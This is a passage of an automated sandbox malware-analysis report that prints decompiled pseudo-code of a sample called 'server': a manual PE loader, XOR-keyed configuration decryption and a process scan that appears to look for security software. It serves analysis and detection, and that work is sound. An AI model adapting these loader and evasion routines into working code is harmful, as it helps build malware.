RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA9 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401BA9(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}

0x00401bb5
0x00401bbb

APIs

RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C

Uniqueness

Uniqueness Score: -1.00%

Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004012FB(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401BC4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E00401000(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E004014CF(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BA9(_t42);
					L8:
					return _t29;
				}
			}

0x00401303
0x00401305
0x00401321
0x00401332
0x00401339
0x00401397
0x00000000
0x0040133b
0x0040133b
0x00401345
0x00401349
0x0040134e
0x00401356
0x0040135a
0x0040135f
0x00401364
0x00401368
0x0040136d
0x0040136e
0x00401372
0x00401377
0x0040137f
0x0040137f
0x00401377
0x00401368
0x0040135a
0x00401381
0x0040138a
0x0040138e
0x00401398
0x0040139e
0x0040139e

APIs

Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0

Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038

Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583

GetLastError.KERNEL32(?,?), ref: 00401379

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5063 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02BD5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E02BD1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E02BD33DC(_a8 + _a8);
					if(_t21 != 0) {
						E02BD22EA(_a4, _t21, _t23);
					}
					E02BD61DA(_a4);
				}
				return _t21;
			}

0x02bd506b
0x02bd5072
0x02bd5074
0x02bd5083
0x02bd508a
0x02bd5099
0x02bd509d
0x02bd50a4
0x02bd50a4
0x02bd50ac
0x02bd50b1
0x02bd50b6

APIs

lstrlen.KERNEL32(00000000,00000000,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD5074

Part of subcall function 02BD1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02BD5088,00000001,02BD3ECE,00000000), ref: 02BD1540
Part of subcall function 02BD1508: memcpy.NTDLL(02BD5088,02BD3ECE,00000010,?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740), ref: 02BD1559
Part of subcall function 02BD1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02BD1582
Part of subcall function 02BD1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02BD159A
Part of subcall function 02BD1508: memcpy.NTDLL(00000000,775EC740,035B9600,00000010), ref: 02BD15EC

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 5d81167579f009319038f48e7a531b860051cb663fb425ce53ca30f2e5f6175b
Instruction ID: fbd9f0383eb0da341be949741aa640b73125908d96cbcd39eee7a82a24963afc
Opcode Fuzzy Hash: 5d81167579f009319038f48e7a531b860051cb663fb425ce53ca30f2e5f6175b
Instruction Fuzzy Hash: 75F05E76100508BBCF216E59DC00DDA3BAEEF843A4B408062FD1DCA010EB31DA559FA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02190F65 Relevance: 21.2, APIs: 14, Instructions: 160threadsleepnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 021912DC: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02190F70), ref: 021912EB
Part of subcall function 021912DC: GetVersion.KERNEL32(?,02190F70), ref: 021912FA
Part of subcall function 021912DC: GetCurrentProcessId.KERNEL32(?,02190F70), ref: 02191316
Part of subcall function 021912DC: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02190F70), ref: 0219132F

Part of subcall function 0219085A: RtlAllocateHeap.NTDLL(00000000,?,02190784), ref: 02190866

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 02190F9A
Sleep.KERNEL32(00000000,00000030), ref: 02190FE1
GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 02191009
GetSystemDefaultUILanguage.KERNEL32 ref: 02191013
VerLanguageNameA.KERNEL32(?,?,00000004), ref: 02191026
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 0219109B
QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 021910B1
GetLastError.KERNEL32 ref: 021910C1
TerminateThread.KERNEL32(00000000,00000000), ref: 021910CB
SetLastError.KERNEL32(00000000), ref: 021910D7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 021910E4
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 021910F6
GetLastError.KERNEL32 ref: 02191101
GetLastError.KERNEL32 ref: 02191112

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 1666582358-0
Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
Instruction ID: 1ba53e60dfea5b9ba8137b6b4bbc4e3c098f89ba7a97a810fb1d2f2dcfb638e0
Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
Instruction Fuzzy Hash: FD51AD71941215BBEF20AFB59D48AAFBA7CEB48752F104136E915E3140D735CA808FA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1D8A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02BD1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x2bda344; // 0x43175ac3
				if(E02BD10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
					 *0x2bda374 = _v8;
				}
				_t33 =  *0x2bda344; // 0x43175ac3
				if(E02BD10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2bda344; // 0x43175ac3
				_push(_t116);
				if(E02BD10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
					L67:
					HeapFree( *0x2bda2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2bda344; // 0x43175ac3
						_t45 = E02BD36C5(_t104, _t102, _t98 ^ 0x523046bc);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2bda2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2bda344; // 0x43175ac3
						_t46 = E02BD36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2bda2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2bda344; // 0x43175ac3
						_t47 = E02BD36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2bda2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2bda344; // 0x43175ac3
						_t48 = E02BD36C5(_t104, _t102, _t86 ^ 0x267c2349);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2bda004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2bda344; // 0x43175ac3
						_t49 = E02BD36C5(_t104, _t102, _t82 ^ 0x167db74c);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2bda02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2bda344; // 0x43175ac3
						_t50 = E02BD36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
					}
					if(_t50 == 0) {
						L41:
						 *0x2bda2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2bda344; // 0x43175ac3
								_t51 = E02BD36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02BD5B85(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02BD607C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2bda344; // 0x43175ac3
								_t52 = E02BD36C5(_t104, _t102, _t70 ^ 0x93710135);
							}
							if(_t52 != 0 && E02BD5B85(0, _t52) != 0) {
								_t122 =  *0x2bda3cc; // 0x35b9600
								E02BD5364(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2bda344; // 0x43175ac3
								_t53 = E02BD36C5(_t104, _t102, _t65 ^ 0x175474b7);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2bda348; // 0x9dd5a8
								_t22 = _t54 + 0x2bdb5f3; // 0x616d692f
								 *0x2bda370 = _t22;
								goto L60;
							} else {
								_t64 = E02BD5B85(0, _t53);
								 *0x2bda370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2bda344; // 0x43175ac3
										_t56 = E02BD36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
									}
									if(_t56 == 0) {
										_t57 =  *0x2bda348; // 0x9dd5a8
										_t23 = _t57 + 0x2bdb899; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02BD5B85(0, _t56);
									}
									 *0x2bda3e0 = _t58;
									HeapFree( *0x2bda2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02bd1d8a
0x02bd1d8a
0x02bd1d8a
0x02bd1d8a
0x02bd1d8d
0x02bd1daa
0x02bd1db8
0x02bd1db8
0x02bd1dbd
0x02bd1dd7
0x02bd2045
0x02bd204c
0x02bd2050
0x02bd2050
0x02bd1ddd
0x02bd1de2
0x02bd1dfa
0x02bd2032
0x02bd203c
0x00000000
0x02bd1e00
0x02bd1e00
0x02bd1e01
0x02bd1e06
0x02bd1e1c
0x02bd1e08
0x02bd1e08
0x02bd1e15
0x02bd1e15
0x02bd1e1e
0x02bd1e27
0x02bd1e29
0x02bd1e33
0x02bd1e38
0x02bd1e38
0x02bd1e33
0x02bd1e3f
0x02bd1e55
0x02bd1e41
0x02bd1e41
0x02bd1e4e
0x02bd1e4e
0x02bd1e59
0x02bd1e5b
0x02bd1e65
0x02bd1e6a
0x02bd1e6a
0x02bd1e65
0x02bd1e71
0x02bd1e87
0x02bd1e73
0x02bd1e73
0x02bd1e80
0x02bd1e80
0x02bd1e8b
0x02bd1e8d
0x02bd1e97
0x02bd1e9c
0x02bd1e9c
0x02bd1e97
0x02bd1ea3
0x02bd1eb9
0x02bd1ea5
0x02bd1ea5
0x02bd1eb2
0x02bd1eb2
0x02bd1ebd
0x02bd1ebf
0x02bd1ec9
0x02bd1ece
0x02bd1ece
0x02bd1ec9
0x02bd1ed5
0x02bd1eeb
0x02bd1ed7
0x02bd1ed7
0x02bd1ee4
0x02bd1ee4
0x02bd1eef
0x02bd1ef1
0x02bd1efb
0x02bd1f00
0x02bd1f00
0x02bd1efb
0x02bd1f07
0x02bd1f1d
0x02bd1f09
0x02bd1f09
0x02bd1f16
0x02bd1f16
0x02bd1f21
0x02bd1f34
0x02bd1f34
0x00000000
0x02bd1f23
0x02bd1f23
0x02bd1f2d
0x00000000
0x02bd1f3e
0x02bd1f3e
0x02bd1f40
0x02bd1f56
0x02bd1f42
0x02bd1f42
0x02bd1f4f
0x02bd1f4f
0x02bd1f5a
0x02bd1f5c
0x02bd1f5f
0x02bd1f60
0x02bd1f67
0x02bd1f69
0x02bd1f6a
0x02bd1f6a
0x02bd1f67
0x02bd1f71
0x02bd1f87
0x02bd1f73
0x02bd1f73
0x02bd1f80
0x02bd1f80
0x02bd1f8b
0x02bd1f99
0x02bd1fa3
0x02bd1fa3
0x02bd1fab
0x02bd1fc1
0x02bd1fad
0x02bd1fad
0x02bd1fba
0x02bd1fba
0x02bd1fc5
0x02bd1fd8
0x02bd1fd8
0x02bd1fdd
0x02bd1fe3
0x00000000
0x02bd1fc7
0x02bd1fca
0x02bd1fcf
0x02bd1fd6
0x02bd1fe8
0x02bd1fea
0x02bd2000
0x02bd1fec
0x02bd1fec
0x02bd1ff9
0x02bd1ff9
0x02bd2004
0x02bd2010
0x02bd2015
0x02bd2015
0x02bd2006
0x02bd2009
0x02bd2009
0x02bd2023
0x02bd2028
0x02bd202e
0x00000000
0x02bd2031
0x00000000
0x02bd1fd6
0x02bd1fc5
0x02bd1f2d
0x02bd1f21

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E2F
StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E61
StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1E93
StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1EC5
StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1EF7
StrToIntExA.SHLWAPI(00000000,00000000,?,02BDA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02BD1F29
HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02BD2028
HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02BD203C

Strings

Uqt, xrefs: 02BD2028, 02BD203C

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 220abe7a458d34f564f6ae2067be5d746506b7e8e00086ea9456f6ad64d6f806
Instruction ID: e3b5ae1bfc1a53cadaa4f92913d0cd82f843d54a4e04713579a7ad69c93f3054
Opcode Fuzzy Hash: 220abe7a458d34f564f6ae2067be5d746506b7e8e00086ea9456f6ad64d6f806
Instruction Fuzzy Hash: 5A81CDB4E21204ABCB10EBB8CD94DEB7BFEEB487547684DA5E409D3204FB75D9408B20

Uniqueness

Uniqueness Score: -1.00%

Function 02BD30D5 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02BD30D5() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2bda348; // 0x9dd5a8
						_t2 = _t9 + 0x2bdbe88; // 0x73617661
						_push( &_v264);
						if( *0x2bda12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02bd30e0
0x02bd30ea
0x02bd30ee
0x02bd30f8
0x02bd3129
0x02bd30ff
0x02bd3104
0x02bd3111
0x02bd311a
0x02bd3131
0x02bd311c
0x02bd3124
0x00000000
0x02bd3124
0x02bd3132
0x02bd3133
0x00000000
0x02bd3133
0x00000000
0x02bd312d
0x02bd3139
0x02bd313e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD30E5
Process32First.KERNEL32(00000000,?), ref: 02BD30F8
Process32Next.KERNEL32(00000000,?), ref: 02BD3124
CloseHandle.KERNEL32(00000000), ref: 02BD3133

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c19e64eba2362a2bb885c5aae4729e96459684928a96e2b75292d469c4e8b1c3
Instruction ID: 5e2ba48cc35e59ccb107e8ef60cab56c3b51c534f0b0ca2439af2541ade9c108
Opcode Fuzzy Hash: c19e64eba2362a2bb885c5aae4729e96459684928a96e2b75292d469c4e8b1c3
Instruction Fuzzy Hash: D7F0BB365015555BD720A676DC4AFDB77EDDBC5350F0100E1EA45C3002FB20C5D9CE62

Uniqueness

Uniqueness Score: -1.00%

Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D68() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401d69
0x00401d77
0x00401d7d
0x00401d84
0x00401ddb
0x00401ddb
0x00401d86
0x00401d8e
0x00401d9b
0x00401d9b
0x00401dd7
0x00401dd9
0x00000000
0x00000000
0x00000000
0x00401d90
0x00401d97
0x00401d9d
0x00401d9d
0x00401da2
0x00401db0
0x00401db5
0x00401dbb
0x00401dc1
0x00401dc8
0x00401dca
0x00401dca
0x00401dd4
0x00401d99
0x00401d99
0x00000000
0x00401d99
0x00401d97

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
GetVersion.KERNEL32 ref: 00401D86
GetCurrentProcessId.KERNEL32 ref: 00401DA2
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
